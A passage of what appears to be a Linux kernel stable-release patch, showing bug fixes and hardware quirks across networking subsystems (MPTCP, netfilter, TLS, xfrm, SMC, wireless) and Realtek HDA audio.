+@@ -2374,6 +2368,26 @@ bool __mptcp_retransmit_pending_data(struct sock *sk)
+ #define MPTCP_CF_PUSH		BIT(1)
+ #define MPTCP_CF_FASTCLOSE	BIT(2)
+ 
++/* be sure to send a reset only if the caller asked for it, also
++ * clean completely the subflow status when the subflow reaches
++ * TCP_CLOSE state
++ */
++static void __mptcp_subflow_disconnect(struct sock *ssk,
++				       struct mptcp_subflow_context *subflow,
++				       unsigned int flags)
++{
++	if (((1 << ssk->sk_state) & (TCPF_CLOSE | TCPF_LISTEN)) ||
++	    (flags & MPTCP_CF_FASTCLOSE)) {
++		/* The MPTCP code never wait on the subflow sockets, TCP-level
++		 * disconnect should never fail
++		 */
++		WARN_ON_ONCE(tcp_disconnect(ssk, 0));
++		mptcp_subflow_ctx_reset(subflow);
++	} else {
++		tcp_shutdown(ssk, SEND_SHUTDOWN);
++	}
++}
++
+ /* subflow sockets can be either outgoing (connect) or incoming
+  * (accept).
+  *
+@@ -2411,7 +2425,7 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 	lock_sock_nested(ssk, SINGLE_DEPTH_NESTING);
+ 
+ 	if ((flags & MPTCP_CF_FASTCLOSE) && !__mptcp_check_fallback(msk)) {
+-		/* be sure to force the tcp_disconnect() path,
++		/* be sure to force the tcp_close path
+ 		 * to generate the egress reset
+ 		 */
+ 		ssk->sk_lingertime = 0;
+@@ -2421,12 +2435,8 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 
+ 	need_push = (flags & MPTCP_CF_PUSH) && __mptcp_retransmit_pending_data(sk);
+ 	if (!dispose_it) {
+-		/* The MPTCP code never wait on the subflow sockets, TCP-level
+-		 * disconnect should never fail
+-		 */
+-		WARN_ON_ONCE(tcp_disconnect(ssk, 0));
++		__mptcp_subflow_disconnect(ssk, subflow, flags);
+ 		msk->subflow->state = SS_UNCONNECTED;
+-		mptcp_subflow_ctx_reset(subflow);
+ 		release_sock(ssk);
+ 
+ 		goto out;
+@@ -3107,12 +3117,6 @@ static int mptcp_disconnect(struct sock *sk, int flags)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+-	/* Deny disconnect if other threads are blocked in sk_wait_event()
+-	 * or inet_wait_for_connect().
+-	 */
+-	if (sk->sk_wait_pending)
+-		return -EBUSY;
+-
+ 	/* We are on the fastopen error path. We can't call straight into the
+ 	 * subflows cleanup code due to lock nesting (we are already under
+ 	 * msk->firstsocket lock).
+@@ -3180,7 +3184,6 @@ struct sock *mptcp_sk_clone_init(const struct sock *sk,
+ 		inet_sk(nsk)->pinet6 = mptcp_inet6_sk(nsk);
+ #endif
+ 
+-	nsk->sk_wait_pending = 0;
+ 	__mptcp_init_sock(nsk);
+ 
+ 	msk = mptcp_sk(nsk);
+diff --git a/net/netfilter/nft_payload.c b/net/netfilter/nft_payload.c
+index d7de2ecb287eb..f44f2eaf32172 100644
+--- a/net/netfilter/nft_payload.c
++++ b/net/netfilter/nft_payload.c
+@@ -132,7 +132,7 @@ void nft_payload_eval(const struct nft_expr *expr,
+ 
+ 	switch (priv->base) {
+ 	case NFT_PAYLOAD_LL_HEADER:
+-		if (!skb_mac_header_was_set(skb))
++		if (!skb_mac_header_was_set(skb) || skb_mac_header_len(skb) == 0)
+ 			goto err;
+ 
+ 		if (skb_vlan_tag_present(skb)) {
+diff --git a/net/netfilter/nft_set_rbtree.c b/net/netfilter/nft_set_rbtree.c
+index 2660ceab3759d..e34662f4a71e0 100644
+--- a/net/netfilter/nft_set_rbtree.c
++++ b/net/netfilter/nft_set_rbtree.c
+@@ -568,6 +568,8 @@ static void *nft_rbtree_deactivate(const struct net *net,
+ 				   nft_rbtree_interval_end(this)) {
+ 				parent = parent->rb_right;
+ 				continue;
++			} else if (nft_set_elem_expired(&rbe->ext)) {
++				break;
+ 			} else if (!nft_set_elem_active(&rbe->ext, genmask)) {
+ 				parent = parent->rb_left;
+ 				continue;
+diff --git a/net/nfc/nci/spi.c b/net/nfc/nci/spi.c
+index 0935527d1d12b..b68150c971d0b 100644
+--- a/net/nfc/nci/spi.c
++++ b/net/nfc/nci/spi.c
+@@ -151,6 +151,8 @@ static int send_acknowledge(struct nci_spi *nspi, u8 acknowledge)
+ 	int ret;
+ 
+ 	skb = nci_skb_alloc(nspi->ndev, 0, GFP_KERNEL);
++	if (!skb)
++		return -ENOMEM;
+ 
+ 	/* add the NCI SPI header to the start of the buffer */
+ 	hdr = skb_push(skb, NCI_SPI_HDR_LEN);
+diff --git a/net/rfkill/rfkill-gpio.c b/net/rfkill/rfkill-gpio.c
+index f5afc9bcdee65..2cc95c8dc4c7b 100644
+--- a/net/rfkill/rfkill-gpio.c
++++ b/net/rfkill/rfkill-gpio.c
+@@ -98,13 +98,13 @@ static int rfkill_gpio_probe(struct platform_device *pdev)
+ 
+ 	rfkill->clk = devm_clk_get(&pdev->dev, NULL);
+ 
+-	gpio = devm_gpiod_get_optional(&pdev->dev, "reset", GPIOD_OUT_LOW);
++	gpio = devm_gpiod_get_optional(&pdev->dev, "reset", GPIOD_ASIS);
+ 	if (IS_ERR(gpio))
+ 		return PTR_ERR(gpio);
+ 
+ 	rfkill->reset_gpio = gpio;
+ 
+-	gpio = devm_gpiod_get_optional(&pdev->dev, "shutdown", GPIOD_OUT_LOW);
++	gpio = devm_gpiod_get_optional(&pdev->dev, "shutdown", GPIOD_ASIS);
+ 	if (IS_ERR(gpio))
+ 		return PTR_ERR(gpio);
+ 
+diff --git a/net/sched/sch_hfsc.c b/net/sched/sch_hfsc.c
+index 61d52594ff6d8..54dddc2ff5025 100644
+--- a/net/sched/sch_hfsc.c
++++ b/net/sched/sch_hfsc.c
+@@ -903,6 +903,14 @@ hfsc_change_usc(struct hfsc_class *cl, struct tc_service_curve *usc,
+ 	cl->cl_flags |= HFSC_USC;
+ }
+ 
++static void
++hfsc_upgrade_rt(struct hfsc_class *cl)
++{
++	cl->cl_fsc = cl->cl_rsc;
++	rtsc_init(&cl->cl_virtual, &cl->cl_fsc, cl->cl_vt, cl->cl_total);
++	cl->cl_flags |= HFSC_FSC;
++}
++
+ static const struct nla_policy hfsc_policy[TCA_HFSC_MAX + 1] = {
+ 	[TCA_HFSC_RSC]	= { .len = sizeof(struct tc_service_curve) },
+ 	[TCA_HFSC_FSC]	= { .len = sizeof(struct tc_service_curve) },
+@@ -1012,10 +1020,6 @@ hfsc_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
+ 		if (parent == NULL)
+ 			return -ENOENT;
+ 	}
+-	if (!(parent->cl_flags & HFSC_FSC) && parent != &q->root) {
+-		NL_SET_ERR_MSG(extack, "Invalid parent - parent class must have FSC");
+-		return -EINVAL;
+-	}
+ 
+ 	if (classid == 0 || TC_H_MAJ(classid ^ sch->handle) != 0)
+ 		return -EINVAL;
+@@ -1066,6 +1070,12 @@ hfsc_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
+ 	cl->cf_tree = RB_ROOT;
+ 
+ 	sch_tree_lock(sch);
++	/* Check if the inner class is a misconfigured 'rt' */
++	if (!(parent->cl_flags & HFSC_FSC) && parent != &q->root) {
++		NL_SET_ERR_MSG(extack,
++			       "Forced curve change on parent 'rt' to 'sc'");
++		hfsc_upgrade_rt(parent);
++	}
+ 	qdisc_class_hash_insert(&q->clhash, &cl->cl_common);
+ 	list_add_tail(&cl->siblings, &parent->children);
+ 	if (parent->level == 0)
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index f774d840759d6..4ea41d6e36969 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -1187,6 +1187,7 @@ static int smc_connect_rdma_v2_prepare(struct smc_sock *smc,
+ 	struct smc_clc_first_contact_ext *fce =
+ 		(struct smc_clc_first_contact_ext *)
+ 			(((u8 *)clc_v2) + sizeof(*clc_v2));
++	struct net *net = sock_net(&smc->sk);
+ 
+ 	if (!ini->first_contact_peer || aclc->hdr.version == SMC_V1)
+ 		return 0;
+@@ -1195,7 +1196,7 @@ static int smc_connect_rdma_v2_prepare(struct smc_sock *smc,
+ 		memcpy(ini->smcrv2.nexthop_mac, &aclc->r0.lcl.mac, ETH_ALEN);
+ 		ini->smcrv2.uses_gateway = false;
+ 	} else {
+-		if (smc_ib_find_route(smc->clcsock->sk->sk_rcv_saddr,
++		if (smc_ib_find_route(net, smc->clcsock->sk->sk_rcv_saddr,
+ 				      smc_ib_gid_to_ipv4(aclc->r0.lcl.gid),
+ 				      ini->smcrv2.nexthop_mac,
+ 				      &ini->smcrv2.uses_gateway))
+@@ -2322,7 +2323,7 @@ static int smc_listen_find_device(struct smc_sock *new_smc,
+ 		smc_find_ism_store_rc(rc, ini);
+ 		return (!rc) ? 0 : ini->rc;
+ 	}
+-	return SMC_CLC_DECL_NOSMCDEV;
++	return prfx_rc;
+ }
+ 
+ /* listen worker: finish RDMA setup */
+diff --git a/net/smc/smc_ib.c b/net/smc/smc_ib.c
+index 854772dd52fd1..ace8611735321 100644
+--- a/net/smc/smc_ib.c
++++ b/net/smc/smc_ib.c
+@@ -193,7 +193,7 @@ bool smc_ib_port_active(struct smc_ib_device *smcibdev, u8 ibport)
+ 	return smcibdev->pattr[ibport - 1].state == IB_PORT_ACTIVE;
+ }
+ 
+-int smc_ib_find_route(__be32 saddr, __be32 daddr,
++int smc_ib_find_route(struct net *net, __be32 saddr, __be32 daddr,
+ 		      u8 nexthop_mac[], u8 *uses_gateway)
+ {
+ 	struct neighbour *neigh = NULL;
+@@ -205,7 +205,7 @@ int smc_ib_find_route(__be32 saddr, __be32 daddr,
+ 
+ 	if (daddr == cpu_to_be32(INADDR_NONE))
+ 		goto out;
+-	rt = ip_route_output_flow(&init_net, &fl4, NULL);
++	rt = ip_route_output_flow(net, &fl4, NULL);
+ 	if (IS_ERR(rt))
+ 		goto out;
+ 	if (rt->rt_uses_gateway && rt->rt_gw_family != AF_INET)
+@@ -235,6 +235,7 @@ static int smc_ib_determine_gid_rcu(const struct net_device *ndev,
+ 	if (smcrv2 && attr->gid_type == IB_GID_TYPE_ROCE_UDP_ENCAP &&
+ 	    smc_ib_gid_to_ipv4((u8 *)&attr->gid) != cpu_to_be32(INADDR_NONE)) {
+ 		struct in_device *in_dev = __in_dev_get_rcu(ndev);
++		struct net *net = dev_net(ndev);
+ 		const struct in_ifaddr *ifa;
+ 		bool subnet_match = false;
+ 
+@@ -248,7 +249,7 @@ static int smc_ib_determine_gid_rcu(const struct net_device *ndev,
+ 		}
+ 		if (!subnet_match)
+ 			goto out;
+-		if (smcrv2->daddr && smc_ib_find_route(smcrv2->saddr,
++		if (smcrv2->daddr && smc_ib_find_route(net, smcrv2->saddr,
+ 						       smcrv2->daddr,
+ 						       smcrv2->nexthop_mac,
+ 						       &smcrv2->uses_gateway))
+diff --git a/net/smc/smc_ib.h b/net/smc/smc_ib.h
+index 034295676e881..ebcb05ede7f55 100644
+--- a/net/smc/smc_ib.h
++++ b/net/smc/smc_ib.h
+@@ -113,7 +113,7 @@ void smc_ib_sync_sg_for_device(struct smc_link *lnk,
+ int smc_ib_determine_gid(struct smc_ib_device *smcibdev, u8 ibport,
+ 			 unsigned short vlan_id, u8 gid[], u8 *sgid_index,
+ 			 struct smc_init_info_smcrv2 *smcrv2);
+-int smc_ib_find_route(__be32 saddr, __be32 daddr,
++int smc_ib_find_route(struct net *net, __be32 saddr, __be32 daddr,
+ 		      u8 nexthop_mac[], u8 *uses_gateway);
+ bool smc_ib_is_valid_local_systemid(void);
+ int smcr_nl_get_device(struct sk_buff *skb, struct netlink_callback *cb);
+diff --git a/net/tls/tls_main.c b/net/tls/tls_main.c
+index f2e7302a4d96b..338a443fa47b2 100644
+--- a/net/tls/tls_main.c
++++ b/net/tls/tls_main.c
+@@ -96,8 +96,8 @@ void update_sk_prot(struct sock *sk, struct tls_context *ctx)
+ 
+ int wait_on_pending_writer(struct sock *sk, long *timeo)
+ {
+-	int rc = 0;
+ 	DEFINE_WAIT_FUNC(wait, woken_wake_function);
++	int ret, rc = 0;
+ 
+ 	add_wait_queue(sk_sleep(sk), &wait);
+ 	while (1) {
+@@ -111,9 +111,13 @@ int wait_on_pending_writer(struct sock *sk, long *timeo)
+ 			break;
+ 		}
+ 
+-		if (sk_wait_event(sk, timeo,
+-				  !READ_ONCE(sk->sk_write_pending), &wait))
++		ret = sk_wait_event(sk, timeo,
++				    !READ_ONCE(sk->sk_write_pending), &wait);
++		if (ret) {
++			if (ret < 0)
++				rc = ret;
+ 			break;
++		}
+ 	}
+ 	remove_wait_queue(sk_sleep(sk), &wait);
+ 	return rc;
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 9be00ebbb2341..2af72d349192e 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -1296,6 +1296,7 @@ tls_rx_rec_wait(struct sock *sk, struct sk_psock *psock, bool nonblock,
+ 	struct tls_context *tls_ctx = tls_get_ctx(sk);
+ 	struct tls_sw_context_rx *ctx = tls_sw_ctx_rx(tls_ctx);
+ 	DEFINE_WAIT_FUNC(wait, woken_wake_function);
++	int ret = 0;
+ 	long timeo;
+ 
+ 	timeo = sock_rcvtimeo(sk, nonblock);
+@@ -1307,6 +1308,9 @@ tls_rx_rec_wait(struct sock *sk, struct sk_psock *psock, bool nonblock,
+ 		if (sk->sk_err)
+ 			return sock_error(sk);
+ 
++		if (ret < 0)
++			return ret;
++
+ 		if (!skb_queue_empty(&sk->sk_receive_queue)) {
+ 			tls_strp_check_rcv(&ctx->strp);
+ 			if (tls_strp_msg_ready(ctx))
+@@ -1325,10 +1329,10 @@ tls_rx_rec_wait(struct sock *sk, struct sk_psock *psock, bool nonblock,
+ 		released = true;
+ 		add_wait_queue(sk_sleep(sk), &wait);
+ 		sk_set_bit(SOCKWQ_ASYNC_WAITDATA, sk);
+-		sk_wait_event(sk, &timeo,
+-			      tls_strp_msg_ready(ctx) ||
+-			      !sk_psock_queue_empty(psock),
+-			      &wait);
++		ret = sk_wait_event(sk, &timeo,
++				    tls_strp_msg_ready(ctx) ||
++				    !sk_psock_queue_empty(psock),
++				    &wait);
+ 		sk_clear_bit(SOCKWQ_ASYNC_WAITDATA, sk);
+ 		remove_wait_queue(sk_sleep(sk), &wait);
+ 
+@@ -1851,13 +1855,11 @@ tls_read_flush_backlog(struct sock *sk, struct tls_prot_info *prot,
+ 	return sk_flush_backlog(sk);
+ }
+ 
+-static int tls_rx_reader_lock(struct sock *sk, struct tls_sw_context_rx *ctx,
+-			      bool nonblock)
++static int tls_rx_reader_acquire(struct sock *sk, struct tls_sw_context_rx *ctx,
++				 bool nonblock)
+ {
+ 	long timeo;
+-	int err;
+-
+-	lock_sock(sk);
++	int ret;
+ 
+ 	timeo = sock_rcvtimeo(sk, nonblock);
+ 
+@@ -1867,30 +1869,36 @@ static int tls_rx_reader_lock(struct sock *sk, struct tls_sw_context_rx *ctx,
+ 		ctx->reader_contended = 1;
+ 
+ 		add_wait_queue(&ctx->wq, &wait);
+-		sk_wait_event(sk, &timeo,
+-			      !READ_ONCE(ctx->reader_present), &wait);
++		ret = sk_wait_event(sk, &timeo,
++				    !READ_ONCE(ctx->reader_present), &wait);
+ 		remove_wait_queue(&ctx->wq, &wait);
+ 
+-		if (timeo <= 0) {
+-			err = -EAGAIN;
+-			goto err_unlock;
+-		}
+-		if (signal_pending(current)) {
+-			err = sock_intr_errno(timeo);
+-			goto err_unlock;
+-		}
++		if (timeo <= 0)
++			return -EAGAIN;
++		if (signal_pending(current))
++			return sock_intr_errno(timeo);
++		if (ret < 0)
++			return ret;
+ 	}
+ 
+ 	WRITE_ONCE(ctx->reader_present, 1);
+ 
+ 	return 0;
++}
+ 
+-err_unlock:
+-	release_sock(sk);
++static int tls_rx_reader_lock(struct sock *sk, struct tls_sw_context_rx *ctx,
++			      bool nonblock)
++{
++	int err;
++
++	lock_sock(sk);
++	err = tls_rx_reader_acquire(sk, ctx, nonblock);
++	if (err)
++		release_sock(sk);
+ 	return err;
+ }
+ 
+-static void tls_rx_reader_unlock(struct sock *sk, struct tls_sw_context_rx *ctx)
++static void tls_rx_reader_release(struct sock *sk, struct tls_sw_context_rx *ctx)
+ {
+ 	if (unlikely(ctx->reader_contended)) {
+ 		if (wq_has_sleeper(&ctx->wq))
+@@ -1902,6 +1910,11 @@ static void tls_rx_reader_unlock(struct sock *sk, struct tls_sw_context_rx *ctx)
+ 	}
+ 
+ 	WRITE_ONCE(ctx->reader_present, 0);
++}
++
++static void tls_rx_reader_unlock(struct sock *sk, struct tls_sw_context_rx *ctx)
++{
++	tls_rx_reader_release(sk, ctx);
+ 	release_sock(sk);
+ }
+ 
+diff --git a/net/wireless/core.c b/net/wireless/core.c
+index 2c79604672062..bf2f1f583fb12 100644
+--- a/net/wireless/core.c
++++ b/net/wireless/core.c
+@@ -1618,7 +1618,7 @@ void wiphy_work_queue(struct wiphy *wiphy, struct wiphy_work *work)
+ 		list_add_tail(&work->entry, &rdev->wiphy_work_list);
+ 	spin_unlock_irqrestore(&rdev->wiphy_work_lock, flags);
+ 
+-	schedule_work(&rdev->wiphy_work);
++	queue_work(system_unbound_wq, &rdev->wiphy_work);
+ }
+ EXPORT_SYMBOL_GPL(wiphy_work_queue);
+ 
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 1d993a490ac4b..b19b5acfaf3a9 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -8289,7 +8289,7 @@ static int nl80211_update_mesh_config(struct sk_buff *skb,
+ 	struct cfg80211_registered_device *rdev = info->user_ptr[0];
+ 	struct net_device *dev = info->user_ptr[1];
+ 	struct wireless_dev *wdev = dev->ieee80211_ptr;
+-	struct mesh_config cfg;
++	struct mesh_config cfg = {};
+ 	u32 mask;
+ 	int err;
+ 
+diff --git a/net/wireless/scan.c b/net/wireless/scan.c
+index e5c1510c098fd..b7e1631b3d80d 100644
+--- a/net/wireless/scan.c
++++ b/net/wireless/scan.c
+@@ -876,6 +876,10 @@ static int cfg80211_scan_6ghz(struct cfg80211_registered_device *rdev)
+ 		    !cfg80211_find_ssid_match(ap, request))
+ 			continue;
+ 
++		if (!is_broadcast_ether_addr(request->bssid) &&
++		    !ether_addr_equal(request->bssid, ap->bssid))
++			continue;
++
+ 		if (!request->n_ssids && ap->multi_bss && !ap->transmitted_bssid)
+ 			continue;
+ 
+diff --git a/net/xfrm/xfrm_interface_core.c b/net/xfrm/xfrm_interface_core.c
+index d71dbe822096a..85501b77f4e37 100644
+--- a/net/xfrm/xfrm_interface_core.c
++++ b/net/xfrm/xfrm_interface_core.c
+@@ -379,8 +379,8 @@ static int xfrmi_rcv_cb(struct sk_buff *skb, int err)
+ 	skb->dev = dev;
+ 
+ 	if (err) {
+-		dev->stats.rx_errors++;
+-		dev->stats.rx_dropped++;
++		DEV_STATS_INC(dev, rx_errors);
++		DEV_STATS_INC(dev, rx_dropped);
+ 
+ 		return 0;
+ 	}
+@@ -425,7 +425,6 @@ static int
+ xfrmi_xmit2(struct sk_buff *skb, struct net_device *dev, struct flowi *fl)
+ {
+ 	struct xfrm_if *xi = netdev_priv(dev);
+-	struct net_device_stats *stats = &xi->dev->stats;
+ 	struct dst_entry *dst = skb_dst(skb);
+ 	unsigned int length = skb->len;
+ 	struct net_device *tdev;
+@@ -464,7 +463,7 @@ xfrmi_xmit2(struct sk_buff *skb, struct net_device *dev, struct flowi *fl)
+ 	tdev = dst->dev;
+ 
+ 	if (tdev == dev) {
+-		stats->collisions++;
++		DEV_STATS_INC(dev, collisions);
+ 		net_warn_ratelimited("%s: Local routing loop detected!\n",
+ 				     dev->name);
+ 		goto tx_err_dst_release;
+@@ -503,13 +502,13 @@ xmit:
+ 	if (net_xmit_eval(err) == 0) {
+ 		dev_sw_netstats_tx_add(dev, 1, length);
+ 	} else {
+-		stats->tx_errors++;
+-		stats->tx_aborted_errors++;
++		DEV_STATS_INC(dev, tx_errors);
++		DEV_STATS_INC(dev, tx_aborted_errors);
+ 	}
+ 
+ 	return 0;
+ tx_err_link_failure:
+-	stats->tx_carrier_errors++;
++	DEV_STATS_INC(dev, tx_carrier_errors);
+ 	dst_link_failure(skb);
+ tx_err_dst_release:
+ 	dst_release(dst);
+@@ -519,7 +518,6 @@ tx_err_dst_release:
+ static netdev_tx_t xfrmi_xmit(struct sk_buff *skb, struct net_device *dev)
+ {
+ 	struct xfrm_if *xi = netdev_priv(dev);
+-	struct net_device_stats *stats = &xi->dev->stats;
+ 	struct dst_entry *dst = skb_dst(skb);
+ 	struct flowi fl;
+ 	int ret;
+@@ -536,7 +534,7 @@ static netdev_tx_t xfrmi_xmit(struct sk_buff *skb, struct net_device *dev)
+ 			dst = ip6_route_output(dev_net(dev), NULL, &fl.u.ip6);
+ 			if (dst->error) {
+ 				dst_release(dst);
+-				stats->tx_carrier_errors++;
++				DEV_STATS_INC(dev, tx_carrier_errors);
+ 				goto tx_err;
+ 			}
+ 			skb_dst_set(skb, dst);
+@@ -552,7 +550,7 @@ static netdev_tx_t xfrmi_xmit(struct sk_buff *skb, struct net_device *dev)
+ 			fl.u.ip4.flowi4_flags |= FLOWI_FLAG_ANYSRC;
+ 			rt = __ip_route_output_key(dev_net(dev), &fl.u.ip4);
+ 			if (IS_ERR(rt)) {
+-				stats->tx_carrier_errors++;
++				DEV_STATS_INC(dev, tx_carrier_errors);
+ 				goto tx_err;
+ 			}
+ 			skb_dst_set(skb, &rt->dst);
+@@ -571,8 +569,8 @@ static netdev_tx_t xfrmi_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	return NETDEV_TX_OK;
+ 
+ tx_err:
+-	stats->tx_errors++;
+-	stats->tx_dropped++;
++	DEV_STATS_INC(dev, tx_errors);
++	DEV_STATS_INC(dev, tx_dropped);
+ 	kfree_skb(skb);
+ 	return NETDEV_TX_OK;
+ }
+diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c
+index e65de78cb61bf..e47c670c7e2cd 100644
+--- a/net/xfrm/xfrm_policy.c
++++ b/net/xfrm/xfrm_policy.c
+@@ -850,7 +850,7 @@ static void xfrm_policy_inexact_list_reinsert(struct net *net,
+ 		struct hlist_node *newpos = NULL;
+ 		bool matches_s, matches_d;
+ 
+-		if (!policy->bydst_reinsert)
++		if (policy->walk.dead || !policy->bydst_reinsert)
+ 			continue;
+ 
+ 		WARN_ON_ONCE(policy->family != family);
+@@ -1255,8 +1255,11 @@ static void xfrm_hash_rebuild(struct work_struct *work)
+ 		struct xfrm_pol_inexact_bin *bin;
+ 		u8 dbits, sbits;
+ 
++		if (policy->walk.dead)
++			continue;
++
+ 		dir = xfrm_policy_id2dir(policy->index);
+-		if (policy->walk.dead || dir >= XFRM_POLICY_MAX)
++		if (dir >= XFRM_POLICY_MAX)
+ 			continue;
+ 
+ 		if ((dir & XFRM_POLICY_MASK) == XFRM_POLICY_OUT) {
+@@ -1371,8 +1374,6 @@ EXPORT_SYMBOL(xfrm_policy_hash_rebuild);
+  * of an absolute inpredictability of ordering of rules. This will not pass. */
+ static u32 xfrm_gen_index(struct net *net, int dir, u32 index)
+ {
+-	static u32 idx_generator;
+-
+ 	for (;;) {
+ 		struct hlist_head *list;
+ 		struct xfrm_policy *p;
+@@ -1380,8 +1381,8 @@ static u32 xfrm_gen_index(struct net *net, int dir, u32 index)
+ 		int found;
+ 
+ 		if (!index) {
+-			idx = (idx_generator | dir);
+-			idx_generator += 8;
++			idx = (net->xfrm.idx_generator | dir);
++			net->xfrm.idx_generator += 8;
+ 		} else {
+ 			idx = index;
+ 			index = 0;
+@@ -1790,9 +1791,11 @@ int xfrm_policy_flush(struct net *net, u8 type, bool task_valid)
+ 
+ again:
+ 	list_for_each_entry(pol, &net->xfrm.policy_all, walk.all) {
++		if (pol->walk.dead)
++			continue;
++
+ 		dir = xfrm_policy_id2dir(pol->index);
+-		if (pol->walk.dead ||
+-		    dir >= XFRM_POLICY_MAX ||
++		if (dir >= XFRM_POLICY_MAX ||
+ 		    pol->type != type)
+ 			continue;
+ 
+@@ -3138,7 +3141,7 @@ no_transform:
+ 	}
+ 
+ 	for (i = 0; i < num_pols; i++)
+-		pols[i]->curlft.use_time = ktime_get_real_seconds();
++		WRITE_ONCE(pols[i]->curlft.use_time, ktime_get_real_seconds());
+ 
+ 	if (num_xfrms < 0) {
+ 		/* Prohibit the flow */
+diff --git a/samples/fprobe/fprobe_example.c b/samples/fprobe/fprobe_example.c
+index e22da8573116e..dd794990ad7ec 100644
+--- a/samples/fprobe/fprobe_example.c
++++ b/samples/fprobe/fprobe_example.c
+@@ -48,7 +48,8 @@ static void show_backtrace(void)
+ 	stack_trace_print(stacks, len, 24);
+ }
+ 
+-static void sample_entry_handler(struct fprobe *fp, unsigned long ip, struct pt_regs *regs)
++static void sample_entry_handler(struct fprobe *fp, unsigned long ip,
++				 struct pt_regs *regs, void *data)
+ {
+ 	if (use_trace)
+ 		/*
+@@ -63,7 +64,8 @@ static void sample_entry_handler(struct fprobe *fp, unsigned long ip, struct pt_
+ 		show_backtrace();
+ }
+ 
+-static void sample_exit_handler(struct fprobe *fp, unsigned long ip, struct pt_regs *regs)
++static void sample_exit_handler(struct fprobe *fp, unsigned long ip, struct pt_regs *regs,
++				void *data)
+ {
+ 	unsigned long rip = instruction_pointer(regs);
+ 
+diff --git a/scripts/kallsyms.c b/scripts/kallsyms.c
+index 80aab2aa72246..ff8cce1757849 100644
+--- a/scripts/kallsyms.c
++++ b/scripts/kallsyms.c
+@@ -602,7 +602,10 @@ static void write_src(void)
+ 	sort_symbols_by_name();
+ 	output_label("kallsyms_seqs_of_names");
+ 	for (i = 0; i < table_cnt; i++)
+-		printf("\t.long\t%u\n", table[i]->seq);
++		printf("\t.byte 0x%02x, 0x%02x, 0x%02x\n",
++			(unsigned char)(table[i]->seq >> 16),
++			(unsigned char)(table[i]->seq >> 8),
++			(unsigned char)(table[i]->seq >> 0));
+ 	printf("\n");
+ 
+ 	output_label("kallsyms_token_table");
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 14e70e2f9c881..0163d4c7fdda8 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -7006,6 +7006,24 @@ static void alc287_fixup_bind_dacs(struct hda_codec *codec,
+ 					0x0); /* Make sure 0x14 was disable */
+ 	}
+ }
++/* Fix none verb table of Headset Mic pin */
++static void alc_fixup_headset_mic(struct hda_codec *codec,
++				   const struct hda_fixup *fix, int action)
++{
++	struct alc_spec *spec = codec->spec;
++	static const struct hda_pintbl pincfgs[] = {
++		{ 0x19, 0x03a1103c },
++		{ }
++	};
++
++	switch (action) {
++	case HDA_FIXUP_ACT_PRE_PROBE:
++		snd_hda_apply_pincfgs(codec, pincfgs);
++		alc_update_coef_idx(codec, 0x45, 0xf<<12 | 1<<10, 5<<12);
++		spec->parse_flags |= HDA_PINCFG_HEADSET_MIC;
++		break;
++	}
++}
+ 
+ 
+ enum {
+@@ -7270,6 +7288,7 @@ enum {
+ 	ALC245_FIXUP_HP_X360_MUTE_LEDS,
+ 	ALC287_FIXUP_THINKPAD_I2S_SPK,
+ 	ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD,
++	ALC2XX_FIXUP_HEADSET_MIC,
+ };
+ 
+ /* A special fixup for Lenovo C940 and Yoga Duet 7;
+@@ -9359,6 +9378,10 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI,
+ 	},
++	[ALC2XX_FIXUP_HEADSET_MIC] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc_fixup_headset_mic,
++	},
+ };
+ 
+ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+@@ -9626,6 +9649,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x89c6, "Zbook Fury 17 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x89ca, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x89d3, "HP EliteBook 645 G9 (MB 89D2)", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8a20, "HP Laptop 15s-fq5xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x8a25, "HP Victus 16-d1xxx (MB 8A25)", ALC245_FIXUP_HP_MUTE_LED_COEFBIT),
+ 	SND_PCI_QUIRK(0x103c, 0x8a78, "HP Dev One", ALC285_FIXUP_HP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x103c, 0x8aa0, "HP ProBook 440 G9 (MB 8A9E)", ALC236_FIXUP_HP_GPIO_LED),
+@@ -9694,6 +9718,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1517, "Asus Zenbook UX31A", ALC269VB_FIXUP_ASUS_ZENBOOK_UX31A),
+ 	SND_PCI_QUIRK(0x1043, 0x1573, "ASUS GZ301V", ALC285_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1662, "ASUS GV301QH", ALC294_FIXUP_ASUS_DUAL_SPK),
++	SND_PCI_QUIRK(0x1043, 0x1663, "ASUS GU603ZV", ALC285_FIXUP_ASUS_HEADSET_MIC),
